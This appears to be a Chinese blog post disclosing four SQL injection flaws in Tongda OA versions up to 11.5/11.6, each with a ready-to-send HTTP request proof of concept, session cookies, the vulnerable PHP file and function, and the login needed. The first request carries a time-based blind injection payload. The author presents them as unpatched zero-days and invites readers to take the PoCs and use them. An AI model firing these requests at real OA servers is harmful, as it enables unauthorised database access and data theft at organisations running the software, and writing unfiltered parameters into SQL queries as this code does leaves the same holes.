美文网首页
代码审计 之 通达OA多枚0day漏洞分享

代码审计 之 通达OA多枚0day漏洞分享

作者: 那个晓文 | 来源:发表于2020-08-24 17:23 被阅读0次

HW被暂停了,没事看看审计,审了一些漏洞出来了,做一个分享哈。

影响范围:

通达OA <= 11.5、11.6版本(2020年04月17日发布了最新11.5版本也受影响)。


image.png

HW这几天看到大家对通达OA的热情度很高,正好今天有空,下载了一个通达OA 11.5版本下来做代码审计,通达OA的代码是加密的,所以需要一个SeayDzend工具解密,百度上就能找到。


image.png

解密后,对代码的各个模块都大致看了一下,很快就发现多处都存在SQL注入漏洞,仔细看了之前的曝光的文章,发现这些漏洞并未曝光,也未预警,也属于0day漏洞吧。
不多说,直接上POC,有需要的可以先拿到用了。

0x01 SQL注入 POC:

漏洞参数:starttime

POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/portal/home/
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Connection: keep-alive
Host: 192.168.43.169
Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 154
X-WVS-ID: Acunetix-Autologin/65535
Cache-Control: no-cache
Accept: */*
Origin: http://192.168.43.169
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1
image.png

漏洞文件:webroot\general\appbuilder\modules\calendar\models\Calendar.php。
get_callist_data函数接收传入的begin_date变量未经过滤直接拼接在查询语句中造成注入。


image.png

利用条件:
一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。

0x02 SQL注入 POC:

漏洞参数:orderby

GET /general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=&timestamp=1598069133&total= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.43.169/
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: 192.168.43.169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close
image.png

漏洞文件:webroot\inc\utility_email.php,get_sentbox_data函数接收传入参数未过滤,直接拼接在order by后面了造成注入。


image.png

利用条件:
一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。

0x03 SQL注入 POC:

漏洞参数:orderby

GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.43.169
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: 192.168.43.169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close
image.png
image.png

漏洞文件:webroot\inc\utility_email.php,get_email_data函数传入参数未过滤,直接拼接在order by后面了造成注入。


image.png

利用条件:
一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。
0x04 SQL注入 POC:
漏洞参数:id

GET /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.43.169
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: 192.168.43.169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close
image.png
image.png

漏洞文件:
webroot\general\appbuilder\modules\report\controllers\RepdetailController.php,actionEdit函数中存在 一个$_GET["id"]; 未经过滤,拼接到SQL查询中,造成了SQL注入。


image.png

利用条件:
一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。

相关文章

  • 2020-08-22通达OA多枚0day漏洞复现

    ​通达OA多枚0day漏洞复现 刚刚群里发了一篇文章-研究复现一波,通达OA多枚0day漏洞poc出来了。 影响范...

  • 代码审计 之 通达OA多枚0day漏洞分享

    HW被暂停了,没事看看审计,审了一些漏洞出来了,做一个分享哈。 影响范围: 通达OA <= 11.5、11.6版本...

  • 通达OA漏洞远程代码执行漏洞复现

    漏洞描述 通达OA是一套办公系统。近日通达OA官方在官方论坛披露了近期一起通达OA用户服务器遭受勒索病毒攻击事件。...

  • 通达OA文件上传漏洞

    0x01 fofa收集目标 title="网络智能办公管理系统"app="通达OA" 0x02测试是否存在上传漏洞...

  • 通达OA文件上传+文件包含RCE

    漏洞概述 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公...

  • 网络安全漏洞分析小结

    (一) 前言 这里感谢师傅前面整理的通达OA一些版本的漏洞复现,这里从漏洞点出发,分析漏洞,从中学些一些师傅白盒挖...

  • 通达OA任意用户登录漏洞

    背景通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个...

  • 2021-12-06-java代码审计初步认知

    一、代码审计的定义代码审计是一种以发现安全漏洞,程序错误和程序违规为目标的源代码分析技能。 二、代码审计需要的能力...

  • 2019-07-28-php代码审计

    一、PHP代码执行代码审计首先讲一下PHP代码执行漏洞和命令执行漏洞的区别,PHP代码执行指的是将php代码植入到...

  • 代码审计——xss漏洞

    XSS漏洞大致分为三种 反射型XSS漏洞 存储型XSS漏洞 基于DOM的XSS漏洞 反射型XSS漏洞 它通过给别人...

网友评论

      本文标题:代码审计 之 通达OA多枚0day漏洞分享

      本文链接:https://www.haomeiwen.com/subject/ezbnjktx.html